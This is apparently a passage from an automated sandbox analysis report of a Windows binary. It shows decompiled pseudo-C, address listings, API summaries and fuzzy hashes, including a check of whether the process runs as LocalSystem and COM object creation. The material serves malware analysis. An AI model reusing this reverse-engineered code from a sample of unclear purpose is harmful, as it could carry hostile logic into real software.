                                                                                                																		 *_t387( &_v228);
                                                                                                																		_v8 = 0x2d;
                                                                                                																		__imp__#6(_t394);
                                                                                                																		goto L53;
                                                                                                																	}
                                                                                                																} else {
                                                                                                																	__eflags = _v100 - _t260;
                                                                                                																	if(_v100 != _t260) {
                                                                                                																		goto L76;
                                                                                                																	} else {
                                                                                                																		goto L26;
                                                                                                																	}
                                                                                                																}
                                                                                                															} else {
                                                                                                																__eflags = _v100 - _t258;
                                                                                                																if(_v100 != _t258) {
                                                                                                																	L76:
                                                                                                																	E00F819E0(0x8007000e);
                                                                                                																	L77:
                                                                                                																	E00F717E0(_t331, _t345, _t380, _t394);
                                                                                                																	L78:
                                                                                                																	E00F98D9C(_t331, _t345, _t380, _t385, __eflags);
                                                                                                																	asm("int3");
                                                                                                																	asm("int3");
                                                                                                																	asm("int3");
                                                                                                																	asm("int3");
                                                                                                																	asm("int3");
                                                                                                																	asm("int3");
                                                                                                																	asm("int3");
                                                                                                																	asm("int3");
                                                                                                																	asm("int3");
                                                                                                																	_push(_t395);
                                                                                                																	_push(0xffffffff);
                                                                                                																	_push(0xfb5c18);
                                                                                                																	_push( *[fs:0x0]);
                                                                                                																	_push(_t345);
                                                                                                																	_t254 =  *0xfcf00c; // 0xfd8fa683
                                                                                                																	_push(_t254 ^ _t398);
                                                                                                																	_t256 =  &_v424;
                                                                                                																	 *[fs:0x0] = _t256;
                                                                                                																	_v428 = _t345;
                                                                                                																	_v416 = 0xffffffff;
                                                                                                																	_t346 =  *_t345;
                                                                                                																	__eflags = _t346;
                                                                                                																	if(_t346 != 0) {
                                                                                                																		_t256 =  *((intOrPtr*)( *_t346 + 8))(_t346);
                                                                                                																	}
                                                                                                																	 *[fs:0x0] = _v20;
                                                                                                																	return _t256;
                                                                                                																} else {
                                                                                                																	goto L24;
                                                                                                																}
                                                                                                															}
                                                                                                														}
                                                                                                													} else {
                                                                                                														_v93 = 0;
                                                                                                														L53:
                                                                                                														_v8 = 0x24;
                                                                                                														_t274 = _v116;
                                                                                                														__eflags = _t274;
                                                                                                														if(_t274 != 0) {
                                                                                                															 *((intOrPtr*)( *_t274 + 8))(_t274);
                                                                                                														}
                                                                                                														goto L55;
                                                                                                													}
                                                                                                												} else {
                                                                                                													_v93 = 0;
                                                                                                													L55:
                                                                                                													_v8 = 0x1c;
                                                                                                													_t275 = _v120;
                                                                                                													__eflags = _t275;
                                                                                                													if(_t275 != 0) {
                                                                                                														 *((intOrPtr*)( *_t275 + 8))(_t275);
                                                                                                													}
                                                                                                													goto L57;
                                                                                                												}
                                                                                                											} else {
                                                                                                												_v93 = 0;
                                                                                                												L57:
                                                                                                												_v8 = 0x15;
                                                                                                												_t276 = _v124;
                                                                                                												__eflags = _t276;
                                                                                                												if(_t276 != 0) {
                                                                                                													 *((intOrPtr*)( *_t276 + 8))(_t276);
                                                                                                												}
                                                                                                												goto L59;
                                                                                                											}
                                                                                                										} else {
                                                                                                											_v93 = 0;
                                                                                                											L59:
                                                                                                											_v8 = 0xf;
                                                                                                											_t277 = _v128;
                                                                                                											__eflags = _t277;
                                                                                                											if(_t277 != 0) {
                                                                                                												 *((intOrPtr*)( *_t277 + 8))(_t277);
                                                                                                											}
                                                                                                											goto L61;
                                                                                                										}
                                                                                                									} else {
                                                                                                										_v93 = 0;
                                                                                                										L61:
                                                                                                										_v8 = 0xa;
                                                                                                										_t278 = _v132;
                                                                                                										__eflags = _t278;
                                                                                                										if(_t278 != 0) {
                                                                                                											 *((intOrPtr*)( *_t278 + 8))(_t278);
                                                                                                										}
                                                                                                										goto L63;
                                                                                                									}
                                                                                                								} else {
                                                                                                									_v93 = 0;
                                                                                                									L63:
                                                                                                									_v8 = 6;
                                                                                                									_t279 = _v136;
                                                                                                									__eflags = _t279;
                                                                                                									if(_t279 != 0) {
                                                                                                										 *((intOrPtr*)( *_t279 + 8))(_t279);
                                                                                                									}
                                                                                                									goto L65;
                                                                                                								}
                                                                                                							} else {
                                                                                                								_v93 = 0;
                                                                                                								L65:
                                                                                                								_v8 = 4;
                                                                                                								_t280 = _v140;
                                                                                                								__eflags = _t280;
                                                                                                								if(_t280 != 0) {
                                                                                                									 *((intOrPtr*)( *_t280 + 8))(_t280);
                                                                                                								}
                                                                                                								_v8 = 2;
                                                                                                								__imp__#9( &_v244);
                                                                                                								goto L68;
                                                                                                							}
                                                                                                						} else {
                                                                                                							_v93 = 0;
                                                                                                							L68:
                                                                                                							_v8 = 0;
                                                                                                							_t282 = _v144;
                                                                                                							if(_t282 != 0) {
                                                                                                								 *((intOrPtr*)( *_t282 + 8))(_t282);
                                                                                                							}
                                                                                                							_v8 = 0xffffffff;
                                                                                                							if(_v101 != 0) {
                                                                                                								__imp__CoUninitialize(); // executed
                                                                                                							}
                                                                                                							L74:
                                                                                                							 *[fs:0x0] = _v16;
                                                                                                							return E00F80D7F(_v20 ^ _t395, _t380);
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                				L81:
                                                                                                			}












































































































                                                                                                0x00f74b10
                                                                                                0x00f74b10
                                                                                                0x00f74b13
                                                                                                0x00f74b15
                                                                                                0x00f74b20
                                                                                                0x00f74b21
                                                                                                0x00f74b27
                                                                                                0x00f74b2c
                                                                                                0x00f74b2e
                                                                                                0x00f74b31
                                                                                                0x00f74b32
                                                                                                0x00f74b33
                                                                                                0x00f74b37
                                                                                                0x00f74b3d
                                                                                                0x00f74b3f
                                                                                                0x00f74b42
                                                                                                0x00f74b4b
                                                                                                0x00f74b4d
                                                                                                0x00f74b50
                                                                                                0x00f74b5a
                                                                                                0x00f751ec
                                                                                                0x00f751f0
                                                                                                0x00f751f8
                                                                                                0x00f751f8
                                                                                                0x00f751fb
                                                                                                0x00f751fd
                                                                                                0x00f751ff
                                                                                                0x00f75201
                                                                                                0x00f75205
                                                                                                0x00f75206
                                                                                                0x00000000
                                                                                                0x00f74b60
                                                                                                0x00f74b60
                                                                                                0x00f74b67
                                                                                                0x00000000
                                                                                                0x00f74b6d
                                                                                                0x00f74b6e
                                                                                                0x00f74b76
                                                                                                0x00f74b7a
                                                                                                0x00f74b7d
                                                                                                0x00f74b83
                                                                                                0x00f74b87
                                                                                                0x00f74b9b
                                                                                                0x00f74ba3
                                                                                                0x00f74bb4
                                                                                                0x00f74bbf
                                                                                                0x00f74bc5
                                                                                                0x00f74bc9
                                                                                                0x00f74bd3
                                                                                                0x00f74bdd
                                                                                                0x00f74bf1
                                                                                                0x00f74bfa
                                                                                                0x00f74bfd
                                                                                                0x00f74bff
                                                                                                0x00f74c0a
                                                                                                0x00f74c14
                                                                                                0x00f74c18
                                                                                                0x00f74c2f
                                                                                                0x00f74c35
                                                                                                0x00f74c37
                                                                                                0x00f74c42
                                                                                                0x00f74c49
                                                                                                0x00f74c4d
                                                                                                0x00f74c50
                                                                                                0x00f74c5a
                                                                                                0x00f74c5d
                                                                                                0x00f74c5f
                                                                                                0x00f74c6a
                                                                                                0x00f74c71
                                                                                                0x00f74c75
                                                                                                0x00f74c78
                                                                                                0x00f74c86
                                                                                                0x00f74c89
                                                                                                0x00f74c8b
                                                                                                0x00f74c96
                                                                                                0x00f74c9d
                                                                                                0x00f74ca1
                                                                                                0x00f74ca4
                                                                                                0x00f74cb0
                                                                                                0x00f74cb2
                                                                                                0x00f74cb4
                                                                                                0x00f74cbf
                                                                                                0x00f74cc6
                                                                                                0x00f74cca
                                                                                                0x00f74ccd
                                                                                                0x00f74cd4
                                                                                                0x00f74cd7
                                                                                                0x00f74cd9
                                                                                                0x00f74ce4
                                                                                                0x00f74ceb
                                                                                                0x00f74cef
                                                                                                0x00f74cf2
                                                                                                0x00f74cfe
                                                                                                0x00f74d00
                                                                                                0x00f74d02
                                                                                                0x00f74d13
                                                                                                0x00f74d18
                                                                                                0x00f74d1a
                                                                                                0x00f74d1c
                                                                                                0x00f74d2b
                                                                                                0x00f74d2d
                                                                                                0x00f74d33
                                                                                                0x00f74d35
                                                                                                0x00f75229
                                                                                                0x00f7522e
                                                                                                0x00000000
                                                                                                0x00f74d3b
                                                                                                0x00f74d3b
                                                                                                0x00000000
                                                                                                0x00f74d3b
                                                                                                0x00f74d1e
                                                                                                0x00f74d1e
                                                                                                0x00f74d20
                                                                                                0x00f74d40
                                                                                                0x00f74d40
                                                                                                0x00f74d44
                                                                                                0x00f74d4c
                                                                                                0x00f74d53
                                                                                                0x00f74d56
                                                                                                0x00f74d59
                                                                                                0x00f74d5b
                                                                                                0x00f74d61
                                                                                                0x00f74d63
                                                                                                0x00f74d6e
                                                                                                0x00f74d6e
                                                                                                0x00f74d72
                                                                                                0x00f74d7a
                                                                                                0x00f74d81
                                                                                                0x00f74d84
                                                                                                0x00f74d87
                                                                                                0x00f74d8d
                                                                                                0x00f74d93
                                                                                                0x00f74d95
                                                                                                0x00f74da0
                                                                                                0x00f74da0
                                                                                                0x00f74dab
                                                                                                0x00f74db1
                                                                                                0x00f74dc1
                                                                                                0x00f74dc8
                                                                                                0x00f74dce
                                                                                                0x00f74dd5
                                                                                                0x00f74dd8
                                                                                                0x00f74ddf
                                                                                                0x00f74de1
                                                                                                0x00f74de9
                                                                                                0x00f74df1
                                                                                                0x00f74df8
                                                                                                0x00f74dfd
                                                                                                0x00f74e00
                                                                                                0x00f74e07
                                                                                                0x00f74e0c
                                                                                                0x00f74e15
                                                                                                0x00f74e18
                                                                                                0x00f74e1a
                                                                                                0x00f74e1c
                                                                                                0x00f74e27
                                                                                                0x00f74e2b
                                                                                                0x00f750e9
                                                                                                0x00f750e9
                                                                                                0x00000000
                                                                                                0x00f74e31
                                                                                                0x00f74e33
                                                                                                0x00f74e36
                                                                                                0x00f74e40
                                                                                                0x00f74e46
                                                                                                0x00f74e4d
                                                                                                0x00f74e54
                                                                                                0x00f74e5b
                                                                                                0x00f74e5d
                                                                                                0x00f74e5f
                                                                                                0x00f74e61
                                                                                                0x00f74e65
                                                                                                0x00f74e6f
                                                                                                0x00f74e72
                                                                                                0x00f74e72
                                                                                                0x00f74e75
                                                                                                0x00f74e78
                                                                                                0x00f74e78
                                                                                                0x00f74e87
                                                                                                0x00f74e8c
                                                                                                0x00f74e90
                                                                                                0x00f74e95
                                                                                                0x00f74e9c
                                                                                                0x00f74ea3
                                                                                                0x00f74ea6
                                                                                                0x00f74ea9
                                                                                                0x00f74eb0
                                                                                                0x00f74eb7
                                                                                                0x00f74ebb
                                                                                                0x00f74ebe
                                                                                                0x00f74ec3
                                                                                                0x00f74ec6
                                                                                                0x00f74f6b
                                                                                                0x00f74f75
                                                                                                0x00f74f7d
                                                                                                0x00000000
                                                                                                0x00f74ecc
                                                                                                0x00f74ecc
                                                                                                0x00f74ecc
                                                                                                0x00f74ecf
                                                                                                0x00f74ed5
                                                                                                0x00f74ed9
                                                                                                0x00f74edc
                                                                                                0x00f74ee3
                                                                                                0x00f74eea
                                                                                                0x00f74ef1
                                                                                                0x00f74ef8
                                                                                                0x00f74efa
                                                                                                0x00000000
                                                                                                0x00f74f00
                                                                                                0x00f74f00
                                                                                                0x00f74f05
                                                                                                0x00f74f08
                                                                                                0x00f74f0b
                                                                                                0x00f74f12
                                                                                                0x00f74f1e
                                                                                                0x00f74f23
                                                                                                0x00f74f29
                                                                                                0x00f74f2c
                                                                                                0x00f74f31
                                                                                                0x00f74f37
                                                                                                0x00f74f3a
                                                                                                0x00f74f3e
                                                                                                0x00f74f42
                                                                                                0x00f74f47
                                                                                                0x00f74f4c
                                                                                                0x00f74f53
                                                                                                0x00f74f5a
                                                                                                0x00f74f5d
                                                                                                0x00f74f64
                                                                                                0x00f74f82
                                                                                                0x00f74f82
                                                                                                0x00f74f86
                                                                                                0x00f74f89
                                                                                                0x00f74f8b
                                                                                                0x00f74f8e
                                                                                                0x00f74f94
                                                                                                0x00f74f9b
                                                                                                0x00f74fa2
                                                                                                0x00f74fa8
                                                                                                0x00f74fab
                                                                                                0x00f74fae
                                                                                                0x00f74fb2
                                                                                                0x00f74fbc
                                                                                                0x00f74fc1
                                                                                                0x00f74fc4
                                                                                                0x00f74fc7
                                                                                                0x00f74fca
                                                                                                0x00f74fcd
                                                                                                0x00f74fd0
                                                                                                0x00f74fd7
                                                                                                0x00f74fdc
                                                                                                0x00f74fe3
                                                                                                0x00f74fe8
                                                                                                0x00f74fee
                                                                                                0x00f74ff4
                                                                                                0x00f74ff6
                                                                                                0x00f74ffd
                                                                                                0x00f74ff8
                                                                                                0x00f74ff8
                                                                                                0x00f74ff8
                                                                                                0x00f75004
                                                                                                0x00f75006
                                                                                                0x00f7500f
                                                                                                0x00f75012
                                                                                                0x00f75014
                                                                                                0x00f7501a
                                                                                                0x00f7501f
                                                                                                0x00f75022
                                                                                                0x00f75022
                                                                                                0x00f7502e
                                                                                                0x00f75034
                                                                                                0x00f75037
                                                                                                0x00f75041
                                                                                                0x00f75047
                                                                                                0x00f7504e
                                                                                                0x00f75054
                                                                                                0x00f75058
                                                                                                0x00f7505b
                                                                                                0x00f75065
                                                                                                0x00f75067
                                                                                                0x00f7506a
                                                                                                0x00f75070
                                                                                                0x00f75070
                                                                                                0x00f75067
                                                                                                0x00f7507a
                                                                                                0x00f7507d
                                                                                                0x00f75080
                                                                                                0x00f75084
                                                                                                0x00f7508a
                                                                                                0x00f7508c
                                                                                                0x00000000
                                                                                                0x00f7508e
                                                                                                0x00f75094
                                                                                                0x00f7509b
                                                                                                0x00f750a0
                                                                                                0x00f750b3
                                                                                                0x00f750b3
                                                                                                0x00f750b5
                                                                                                0x00f750b8
                                                                                                0x00f750b8
                                                                                                0x00f750be
                                                                                                0x00f750c8
                                                                                                0x00f750d2
                                                                                                0x00000000
                                                                                                0x00f750a2
                                                                                                0x00f750a2
                                                                                                0x00f750aa
                                                                                                0x00f750ad
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f750ad
                                                                                                0x00f750a0
                                                                                                0x00f7508c
                                                                                                0x00f74efa
                                                                                                0x00000000
                                                                                                0x00f750dc
                                                                                                0x00f750dc
                                                                                                0x00f750dc
                                                                                                0x00000000
                                                                                                0x00f74e40
                                                                                                0x00f74e1e
                                                                                                0x00f74e1e
                                                                                                0x00f750ed
                                                                                                0x00f750ed
                                                                                                0x00f750f7
                                                                                                0x00f750fe
                                                                                                0x00f75100
                                                                                                0x00f7510b
                                                                                                0x00f7510d
                                                                                                0x00f75118
                                                                                                0x00f7511a
                                                                                                0x00f75125
                                                                                                0x00f75127
                                                                                                0x00f7512c
                                                                                                0x00000000
                                                                                                0x00f7512c
                                                                                                0x00f74d97
                                                                                                0x00f74d97
                                                                                                0x00f74d9a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f74d9a
                                                                                                0x00f74d65
                                                                                                0x00f74d65
                                                                                                0x00f74d68
                                                                                                0x00f75233
                                                                                                0x00f75238
                                                                                                0x00f7523d
                                                                                                0x00f7523d
                                                                                                0x00f75242
                                                                                                0x00f75242
                                                                                                0x00f75247
                                                                                                0x00f75248
                                                                                                0x00f75249
                                                                                                0x00f7524a
                                                                                                0x00f7524b
                                                                                                0x00f7524c
                                                                                                0x00f7524d
                                                                                                0x00f7524e
                                                                                                0x00f7524f
                                                                                                0x00f75250
                                                                                                0x00f75253
                                                                                                0x00f75255
                                                                                                0x00f75260
                                                                                                0x00f75261
                                                                                                0x00f75262
                                                                                                0x00f75269
                                                                                                0x00f7526a
                                                                                                0x00f7526d
                                                                                                0x00f75273
                                                                                                0x00f75276
                                                                                                0x00f7527d
                                                                                                0x00f7527f
                                                                                                0x00f75281
                                                                                                0x00f75286
                                                                                                0x00f75286
                                                                                                0x00f7528c
                                                                                                0x00f75297
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f74d68
                                                                                                0x00f74d63
                                                                                                0x00f74d04
                                                                                                0x00f74d04
                                                                                                0x00f75132
                                                                                                0x00f75132
                                                                                                0x00f75136
                                                                                                0x00f75139
                                                                                                0x00f7513b
                                                                                                0x00f75140
                                                                                                0x00f75140
                                                                                                0x00000000
                                                                                                0x00f7513b
                                                                                                0x00f74cdb
                                                                                                0x00f74cdb
                                                                                                0x00f75143
                                                                                                0x00f75143
                                                                                                0x00f75147
                                                                                                0x00f7514a
                                                                                                0x00f7514c
                                                                                                0x00f75151
                                                                                                0x00f75151
                                                                                                0x00000000
                                                                                                0x00f7514c
                                                                                                0x00f74cb6
                                                                                                0x00f74cb6
                                                                                                0x00f75154
                                                                                                0x00f75154
                                                                                                0x00f75158
                                                                                                0x00f7515b
                                                                                                0x00f7515d
                                                                                                0x00f75162
                                                                                                0x00f75162
                                                                                                0x00000000
                                                                                                0x00f7515d
                                                                                                0x00f74c8d
                                                                                                0x00f74c8d
                                                                                                0x00f75165
                                                                                                0x00f75165
                                                                                                0x00f75169
                                                                                                0x00f7516c
                                                                                                0x00f7516e
                                                                                                0x00f75173
                                                                                                0x00f75173
                                                                                                0x00000000
                                                                                                0x00f7516e
                                                                                                0x00f74c61
                                                                                                0x00f74c61
                                                                                                0x00f75176
                                                                                                0x00f75176
                                                                                                0x00f7517a
                                                                                                0x00f7517d
                                                                                                0x00f7517f
                                                                                                0x00f75184
                                                                                                0x00f75184
                                                                                                0x00000000
                                                                                                0x00f7517f
                                                                                                0x00f74c39
                                                                                                0x00f74c39
                                                                                                0x00f75187
                                                                                                0x00f75187
                                                                                                0x00f7518b
                                                                                                0x00f75191
                                                                                                0x00f75193
                                                                                                0x00f75198
                                                                                                0x00f75198
                                                                                                0x00000000
                                                                                                0x00f75193
                                                                                                0x00f74c01
                                                                                                0x00f74c01
                                                                                                0x00f7519b
                                                                                                0x00f7519b
                                                                                                0x00f7519f
                                                                                                0x00f751a5
                                                                                                0x00f751a7
                                                                                                0x00f751ac
                                                                                                0x00f751ac
                                                                                                0x00f751af
                                                                                                0x00f751ba
                                                                                                0x00000000
                                                                                                0x00f751ba
                                                                                                0x00f74ba5
                                                                                                0x00f74ba5
                                                                                                0x00f751c0
                                                                                                0x00f751c0
                                                                                                0x00f751c4
                                                                                                0x00f751cc
                                                                                                0x00f751d1
                                                                                                0x00f751d1
                                                                                                0x00f751d4
                                                                                                0x00f751df
                                                                                                0x00f751e1
                                                                                                0x00f751e1
                                                                                                0x00f7520e
                                                                                                0x00f75211
                                                                                                0x00f75228
                                                                                                0x00f75228
                                                                                                0x00f74ba3
                                                                                                0x00f74b67
                                                                                                0x00000000

                                                                                                APIs
                                                                                                  • Part of subcall function 00F75810: GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,00000000), ref: 00F75820
                                                                                                  • Part of subcall function 00F75810: OpenProcessToken.ADVAPI32(00000000,?,?,?,00000000), ref: 00F75827
                                                                                                • CoInitialize.OLE32(00000000), ref: 00F74B6E
                                                                                                • CoCreateInstance.OLE32(00FB8280,00000000,00000004,00FC6FD8,?,?), ref: 00F74B9B
                                                                                                • VariantInit.OLEAUT32(?), ref: 00F74BBF
                                                                                                • VariantClear.OLEAUT32(?), ref: 00F751BA
                                                                                                • CoUninitialize.OLE32 ref: 00F751E1
                                                                                                • _com_issue_error.COMSUPP ref: 00F75238
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ProcessVariant$ClearCreateCurrentInitInitializeInstanceOpenTokenUninitialize_com_issue_error
                                                                                                • String ID: $
                                                                                                • API String ID: 1591724318-3993045852
                                                                                                • Opcode ID: 9a02963fd87bb0b344b6cf059e0ef37cb7bfe1b561cd68e3ead72fdbb89bb940
                                                                                                • Instruction ID: 2944129a0e19095a800509bdd21223ea512f0d4b67be52213d74ce45a1b5b695
                                                                                                • Opcode Fuzzy Hash: 9a02963fd87bb0b344b6cf059e0ef37cb7bfe1b561cd68e3ead72fdbb89bb940
                                                                                                • Instruction Fuzzy Hash: 1D328C70E04298DFDF11CFA8C848B9DBBB5BF55304F24819EE409EB281DBB49A45DB52
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 84%
                                                                                                			E00F773E0(void* __edx, void* __edi, void* __esi) {
                                                                                                				void* _v8;
                                                                                                				void* _v12;
                                                                                                				signed int _v16;
                                                                                                				signed int _v20;
                                                                                                				void* _v24;
                                                                                                				void* _v28;
                                                                                                				char _v32;
                                                                                                				signed int _v36;
                                                                                                				intOrPtr _v40;
                                                                                                				char _v44;
                                                                                                				intOrPtr _v48;
                                                                                                				intOrPtr _v52;
                                                                                                				char _v68;
                                                                                                				void* _v72;
                                                                                                				intOrPtr _v76;
                                                                                                				void* _v80;
                                                                                                				void* _v84;
                                                                                                				void* _v88;
                                                                                                				char _v116;
                                                                                                				void* _v136;
                                                                                                				intOrPtr _v160;
                                                                                                				void* __ebx;
                                                                                                				signed int _t149;
                                                                                                				signed int _t150;
                                                                                                				void* _t157;
                                                                                                				signed int _t167;
                                                                                                				signed int _t169;
                                                                                                				signed int _t170;
                                                                                                				signed int _t171;
                                                                                                				signed int _t175;
                                                                                                				signed int _t180;
                                                                                                				signed int _t182;
                                                                                                				signed int _t184;
                                                                                                				signed int _t187;
                                                                                                				signed int _t192;
                                                                                                				signed int _t193;
                                                                                                				signed int _t196;
                                                                                                				signed int _t197;
                                                                                                				signed int _t200;
                                                                                                				signed int _t217;
                                                                                                				signed int _t219;
                                                                                                				signed int _t222;
                                                                                                				signed int _t223;
                                                                                                				signed int _t226;
                                                                                                				signed int _t227;
                                                                                                				signed int _t247;
                                                                                                				intOrPtr _t251;
                                                                                                				signed int _t254;
                                                                                                				void* _t255;
                                                                                                				void* _t256;
                                                                                                				signed int _t258;
                                                                                                				signed int _t260;
                                                                                                				long _t261;
                                                                                                				void* _t269;
                                                                                                				signed int _t279;
                                                                                                				signed int _t295;
                                                                                                				signed int _t296;
                                                                                                				signed int _t297;
                                                                                                				signed int _t299;
                                                                                                				signed int _t300;
                                                                                                				signed int _t301;
                                                                                                				signed int _t302;
                                                                                                				signed int _t303;
                                                                                                				signed int _t304;
                                                                                                				signed int _t315;
                                                                                                				signed int _t316;
                                                                                                				signed int _t317;
                                                                                                				signed int _t319;
                                                                                                				signed int _t320;
                                                                                                				signed int _t321;
                                                                                                				signed int _t322;
                                                                                                				signed int _t323;
                                                                                                				signed int _t324;
                                                                                                				void* _t330;
                                                                                                				intOrPtr* _t341;
                                                                                                				intOrPtr* _t343;
                                                                                                				intOrPtr* _t345;
                                                                                                				void* _t346;
                                                                                                				intOrPtr* _t350;
                                                                                                				intOrPtr* _t352;
                                                                                                				intOrPtr* _t354;
                                                                                                				void* _t355;
                                                                                                				void* _t358;
                                                                                                				signed int _t359;
                                                                                                				void* _t365;
                                                                                                				signed int _t366;
                                                                                                				signed int* _t368;
                                                                                                				signed int _t370;
                                                                                                				signed int _t373;
                                                                                                				void* _t377;
                                                                                                				signed int _t378;
                                                                                                				signed int _t384;
                                                                                                				signed int _t385;
                                                                                                
                                                                                                				_t365 = __esi;
                                                                                                				_t358 = __edi;
                                                                                                				_t333 = __edx;
                                                                                                				_t378 = _t384;
                                                                                                				_t385 = _t384 - 0x4c;
                                                                                                				_t149 =  *0xfcf00c; // 0xfd8fa683
                                                                                                				_t150 = _t149 ^ _t378;
                                                                                                				_v20 = _t150;
                                                                                                				 *[fs:0x0] =  &_v16;
                                                                                                				_v76 = 0xfc6b50;
                                                                                                				_v72 = 0;
                                                                                                				_v8 = 0;
                                                                                                				 *((intOrPtr*)(_v76 + 4))(_t150, _t255,  *[fs:0x0], 0xfb5fd0, 0xffffffff, _t377);
                                                                                                				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v72) != 0) {
                                                                                                					E00F75C10( &_v88); // executed
                                                                                                					_v8 = 1;
                                                                                                					_t333 = _v88;
                                                                                                					__eflags = _t333 - _v84;
                                                                                                					if(_t333 == _v84) {
                                                                                                						L9:
                                                                                                						_t256 = 0;
                                                                                                						__eflags = 0;
                                                                                                					} else {
                                                                                                						__eflags = _t333;
                                                                                                						if(_t333 == 0) {
                                                                                                							goto L9;
                                                                                                						} else {
                                                                                                							E00F75D70( &_v68,  *_t333);
                                                                                                							_v8 = 2;
                                                                                                							_v28 = 0;
                                                                                                							_v24 = 0;
                                                                                                							_v28 = 0;
                                                                                                							_v24 = 7;
                                                                                                							_v44 = 0;
                                                                                                							E00F71D10(_t255,  &_v44, __edi, __esi, L"S-1-5-18", 8);
                                                                                                							_v8 = 3;
                                                                                                							__eflags = _v24 - 8;
                                                                                                							_t251 = _v52;
                                                                                                							_t333 =  >=  ? _v44 :  &_v44;
                                                                                                							__eflags = _v48 - 8;
                                                                                                							_t330 =  >=  ? _v68 :  &_v68;
                                                                                                							__eflags = _t251 - _v28;
                                                                                                							if(_t251 != _v28) {
                                                                                                								L7:
                                                                                                								_t256 = 0;
                                                                                                								__eflags = 0;
                                                                                                							} else {
                                                                                                								_t254 = E00F71C40(_t330, _t333, _t251);
                                                                                                								_t385 = _t385 + 4;
                                                                                                								__eflags = _t254;
                                                                                                								if(_t254 != 0) {
                                                                                                									goto L7;
                                                                                                								} else {
                                                                                                									_t256 = 1;
                                                                                                								}
                                                                                                							}
                                                                                                							_v8 = 2;
                                                                                                							E00F72D10( &_v44);
                                                                                                							_v8 = 1;
                                                                                                							E00F72D10( &_v68);
                                                                                                						}
                                                                                                					}
                                                                                                					_v8 = 0;
                                                                                                					_t269 = _v88;
                                                                                                					__eflags = _t269;
                                                                                                					if(_t269 == 0) {
                                                                                                						goto L16;
                                                                                                					} else {
                                                                                                						_t333 = _t269;
                                                                                                						__eflags = _v80 - _t269 - 0x1000;
                                                                                                						if(_v80 - _t269 < 0x1000) {
                                                                                                							L13:
                                                                                                							__eflags = _t269;
                                                                                                							if(_t269 != 0) {
                                                                                                								LocalFree(_t269);
                                                                                                							}
                                                                                                							_v88 = 0;
                                                                                                							_v84 = 0;
                                                                                                							_v80 = 0;
                                                                                                							goto L16;
                                                                                                						} else {
                                                                                                							_t269 =  *(_t269 - 4);
                                                                                                							_t333 = _t333 - _t269;
                                                                                                							__eflags = _t333 - 4 - 0x1f;
                                                                                                							if(__eflags > 0) {
                                                                                                								E00F98D9C(_t256, _t269, _t333, _t358, __eflags);
                                                                                                								asm("int3");
                                                                                                								asm("int3");
                                                                                                								asm("int3");
                                                                                                								asm("int3");
                                                                                                								asm("int3");
                                                                                                								asm("int3");
                                                                                                								asm("int3");
                                                                                                								asm("int3");
                                                                                                								asm("int3");
                                                                                                								asm("int3");
                                                                                                								asm("int3");
                                                                                                								asm("int3");
                                                                                                								asm("int3");
                                                                                                								asm("int3");
                                                                                                								_push(_t378);
                                                                                                								_t380 = _t385;
                                                                                                								_push(0xffffffff);
                                                                                                								_push(0xfb6090);
                                                                                                								_push( *[fs:0x0]);
                                                                                                								_push(_t256);
                                                                                                								_push(_t365);
                                                                                                								_push(_t358);
                                                                                                								_t167 =  *0xfcf00c; // 0xfd8fa683
                                                                                                								_push(_t167 ^ _t385);
                                                                                                								_t169 =  &_v116;
                                                                                                								 *[fs:0x0] = _t169;
                                                                                                								_v136 = _t333;
                                                                                                								_t366 = _t269;
                                                                                                								__eflags = _t366;
                                                                                                								if(_t366 != 0) {
                                                                                                									_t170 = E00F773E0(_t333, _t358, _t366); // executed
                                                                                                									_t258 = _t170;
                                                                                                									_t171 = E00F76110(_t258, _t358, __eflags);
                                                                                                									__eflags = _t171;
                                                                                                									if(_t171 == 0) {
                                                                                                										L57:
                                                                                                										_t359 =  *(_t366 + 0xc);
                                                                                                										_v36 = 0;
                                                                                                										__eflags =  *(_t366 + 0x19);
                                                                                                										_t260 = 0 |  *(_t366 + 0x19) == 0x00000000;
                                                                                                										_t269 = 0;
                                                                                                										__eflags =  *(_t366 + 0x1a);
                                                                                                										_t173 =  ==  ? 0 :  &_v36;
                                                                                                										_v44 =  ==  ? 0 :  &_v36;
                                                                                                										_v48 =  *((intOrPtr*)(_t366 + 0x18));
                                                                                                										_t175 = E00F72170(0);
                                                                                                										__eflags = _t175;
                                                                                                										if(_t175 == 0) {
                                                                                                											goto L88;
                                                                                                										} else {
                                                                                                											_t333 =  *_t175;
                                                                                                											_v24 =  *((intOrPtr*)( *_t175 + 0xc))() + 0x10;
                                                                                                											_v12 = 0;
                                                                                                											_t269 =  &_v24;
                                                                                                											_t192 = E00F73FC0(_t260, _t269, _t380, _t359);
                                                                                                											__eflags = _t192;
                                                                                                											if(_t192 == 0) {
                                                                                                												__eflags = _t359;
                                                                                                												if(_t359 != 0) {
                                                                                                													_t302 = _t359;
                                                                                                													_t333 = _t302 + 2;
                                                                                                													do {
                                                                                                														_t192 =  *_t302;
                                                                                                														_t302 = _t302 + 2;
                                                                                                														__eflags = _t192;
                                                                                                													} while (_t192 != 0);
                                                                                                													_t303 = _t302 - _t333;
                                                                                                													__eflags = _t303;
                                                                                                													_t304 = _t303 >> 1;
                                                                                                												} else {
                                                                                                													_t304 = 0;
                                                                                                												}
                                                                                                												_t269 =  &_v24;
                                                                                                												E00F743C0(_t192, _t269, _t359, _t304);
                                                                                                											}
                                                                                                											_v12 = 1;
                                                                                                											_t359 =  *(_t366 + 4);
                                                                                                											_t193 = E00F72170(_t269);
                                                                                                											__eflags = _t193;
